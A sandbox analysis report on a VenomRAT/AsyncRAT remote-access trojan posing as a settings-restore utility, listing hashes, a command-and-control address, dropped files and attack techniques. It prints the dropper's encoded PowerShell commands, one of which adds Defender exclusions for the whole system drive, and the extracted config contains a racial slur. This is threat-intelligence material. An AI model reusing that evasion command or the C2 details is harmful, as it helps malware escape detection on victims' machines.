asyncrat | 59131a7e8725c4de5a4e1fe5e3febf9f861c22f58ad0cb179bf4d2f419613abf

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07/02/2025, 03:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EXMSettingsRestoreUtility.exe
Size

122KB
MD5

15f043fb9ac824a896d33502ce43a501
SHA1

e8b8ff0633441603405bf83e57bafa385ca0e784
SHA256

59131a7e8725c4de5a4e1fe5e3febf9f861c22f58ad0cb179bf4d2f419613abf
SHA512

7e9756b1694be946d460d37188e9d193f3e128abe692ca770ef6893f8979800b017b23d4d4a42d6fa546bf12c5f495b3cb6e2fa866e1b805b8a997f50b46d1b9
SSDEEP

3072:Um8Y3AavY9QonIV6fAaCTgDEZ9DAxpz6+l5nlKv0Mp5:U23tvYaeIk5CTgDEZBMuw5nlKvnp

Score

10^/10

asyncrat venomrat default defense_evasion discovery rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

193.161.193.99:304480

Mutex

nigger93

Attributes

delay
1
install
true
install_file
nigger93.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

VenomRAT 2 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral1/files/0x0008000000016df5-12.dat	VenomRAT
behavioral1/memory/2132-33-0x0000000000D60000-0x0000000000D78000-memory.dmp	VenomRAT

Venomrat family
venomrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0008000000016df5-12.dat	family_asyncrat

Executes dropped EXE 2 IoCs

pid	Process
2840	revertsettings.exe
2132	aurafarm.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\revertsettings.exe	EXMSettingsRestoreUtility.exe
File created	C:\Windows\aurafarm.exe	EXMSettingsRestoreUtility.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXMSettingsRestoreUtility.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	revertsettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2876	powershell.exe
2748	powershell.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	2132	aurafarm.exe
Token: SeIncreaseQuotaPrivilege	2132	aurafarm.exe
Token: SeSecurityPrivilege	2132	aurafarm.exe
Token: SeTakeOwnershipPrivilege	2132	aurafarm.exe
Token: SeLoadDriverPrivilege	2132	aurafarm.exe
Token: SeSystemProfilePrivilege	2132	aurafarm.exe
Token: SeSystemtimePrivilege	2132	aurafarm.exe
Token: SeProfSingleProcessPrivilege	2132	aurafarm.exe
Token: SeIncBasePriorityPrivilege	2132	aurafarm.exe
Token: SeCreatePagefilePrivilege	2132	aurafarm.exe
Token: SeBackupPrivilege	2132	aurafarm.exe
Token: SeRestorePrivilege	2132	aurafarm.exe
Token: SeShutdownPrivilege	2132	aurafarm.exe
Token: SeDebugPrivilege	2132	aurafarm.exe
Token: SeSystemEnvironmentPrivilege	2132	aurafarm.exe
Token: SeRemoteShutdownPrivilege	2132	aurafarm.exe
Token: SeUndockPrivilege	2132	aurafarm.exe
Token: SeManageVolumePrivilege	2132	aurafarm.exe
Token: 33	2132	aurafarm.exe
Token: 34	2132	aurafarm.exe
Token: 35	2132	aurafarm.exe
Token: SeIncreaseQuotaPrivilege	2132	aurafarm.exe
Token: SeSecurityPrivilege	2132	aurafarm.exe
Token: SeTakeOwnershipPrivilege	2132	aurafarm.exe
Token: SeLoadDriverPrivilege	2132	aurafarm.exe
Token: SeSystemProfilePrivilege	2132	aurafarm.exe
Token: SeSystemtimePrivilege	2132	aurafarm.exe
Token: SeProfSingleProcessPrivilege	2132	aurafarm.exe
Token: SeIncBasePriorityPrivilege	2132	aurafarm.exe
Token: SeCreatePagefilePrivilege	2132	aurafarm.exe
Token: SeBackupPrivilege	2132	aurafarm.exe
Token: SeRestorePrivilege	2132	aurafarm.exe
Token: SeShutdownPrivilege	2132	aurafarm.exe
Token: SeDebugPrivilege	2132	aurafarm.exe
Token: SeSystemEnvironmentPrivilege	2132	aurafarm.exe
Token: SeRemoteShutdownPrivilege	2132	aurafarm.exe
Token: SeUndockPrivilege	2132	aurafarm.exe
Token: SeManageVolumePrivilege	2132	aurafarm.exe
Token: 33	2132	aurafarm.exe
Token: 34	2132	aurafarm.exe
Token: 35	2132	aurafarm.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2316 wrote to memory of 2748	2316	EXMSettingsRestoreUtility.exe	30
PID 2316 wrote to memory of 2748	2316	EXMSettingsRestoreUtility.exe	30
PID 2316 wrote to memory of 2748	2316	EXMSettingsRestoreUtility.exe	30
PID 2316 wrote to memory of 2748	2316	EXMSettingsRestoreUtility.exe	30
PID 2316 wrote to memory of 2876	2316	EXMSettingsRestoreUtility.exe	32
PID 2316 wrote to memory of 2876	2316	EXMSettingsRestoreUtility.exe	32
PID 2316 wrote to memory of 2876	2316	EXMSettingsRestoreUtility.exe	32
PID 2316 wrote to memory of 2876	2316	EXMSettingsRestoreUtility.exe	32
PID 2316 wrote to memory of 2840	2316	EXMSettingsRestoreUtility.exe	34
PID 2316 wrote to memory of 2840	2316	EXMSettingsRestoreUtility.exe	34
PID 2316 wrote to memory of 2840	2316	EXMSettingsRestoreUtility.exe	34
PID 2316 wrote to memory of 2840	2316	EXMSettingsRestoreUtility.exe	34
PID 2316 wrote to memory of 2132	2316	EXMSettingsRestoreUtility.exe	35
PID 2316 wrote to memory of 2132	2316	EXMSettingsRestoreUtility.exe	35
PID 2316 wrote to memory of 2132	2316	EXMSettingsRestoreUtility.exe	35
PID 2316 wrote to memory of 2132	2316	EXMSettingsRestoreUtility.exe	35
PID 2840 wrote to memory of 2644	2840	revertsettings.exe	36
PID 2840 wrote to memory of 2644	2840	revertsettings.exe	36
PID 2840 wrote to memory of 2644	2840	revertsettings.exe	36
PID 2840 wrote to memory of 2644	2840	revertsettings.exe	36

C:\Users\Admin\AppData\Local\Temp\EXMSettingsRestoreUtility.exe
"C:\Users\Admin\AppData\Local\Temp\EXMSettingsRestoreUtility.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2316
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbgB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAcABjACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAGwAaQBjAGUAbgBzAGUALgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAaAB4AGUAIwA+AA=="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2748
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbABoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAeQB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABxACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2876
- C:\Windows\revertsettings.exe
  "C:\Windows\revertsettings.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2840
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\7z6DDDAB18\delete.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2644
- C:\Windows\aurafarm.exe
  "C:\Windows\aurafarm.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7z6DDDAB18\delete.bat

Filesize
804B

MD5
a5750c0882d205435451003cbe31d9f2

SHA1
e30d35353f4e99ad62c1b7514a638ed55a1a35d5

SHA256
173a92a2f66bde79504376fa94772687fdb9dc6539ff72a781acb3a23626e5c1

SHA512
f9d2e5d7c30411d988712d8b8e0f75b5cbf303e35a9b1108ff57117dcaa1b9eef9e05d19f7f4c79c1fcb365b91c508f5f547f24b0a30a859e473d9916332bdfd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
d03c5d3f08ab81b39aafc98ad8eb53f6

SHA1
9de286020bce353d134ba05f702aa9290d457d46

SHA256
b0de74049bcfcecd5556a4e8f7d42a7a81e6f318003f797401732891a9c8060f

SHA512
89f4de68ed65465a41a86fe13992540d544915329f222ffaa188bd3bd91d465633350f17f95d68c48db6a881f84310f72a6c2ddd622b5553dcdf34b9eb016bd9

Download Submit
C:\Windows\aurafarm.exe

Filesize
74KB

MD5
80724101ed2cbfb0750ca6b7ac4a9f0e

SHA1
f240dd5f7b52974adf43075e0b74126ceb380968

SHA256
c866481dc9369e31e4d9a2eb296b2a35849f658141045bba8f879c0c8978bb36

SHA512
05dc8267a217d69bedd525be275518e956c859fe781ed57cb8d342434c7c4787fadd0827d5e39a0da450ddd9f463ce91d4a7205a14eb328037af4a869c6fbbe3

Download Submit
C:\Windows\revertsettings.exe

Filesize
42KB

MD5
98cc493ee9f783b20c5d614529d6a34c

SHA1
eaf1e20cddf94a131e1b5a85c629d91b631933f0

SHA256
55ae6e6612a0106cb0b0723622014474259653c2bf6970eba4725875509e36f8

SHA512
f656d45047abeb3f9532e0d606f3ebfb288033195b7c439eedec96761e3a049801a685129e41aed64d3f903882469fbe4e5c20aa15fd0f6e55bfa348d77d6ab9

Download Submit
memory/2132-33-0x0000000000D60000-0x0000000000D78000-memory.dmp

Filesize
96KB

Download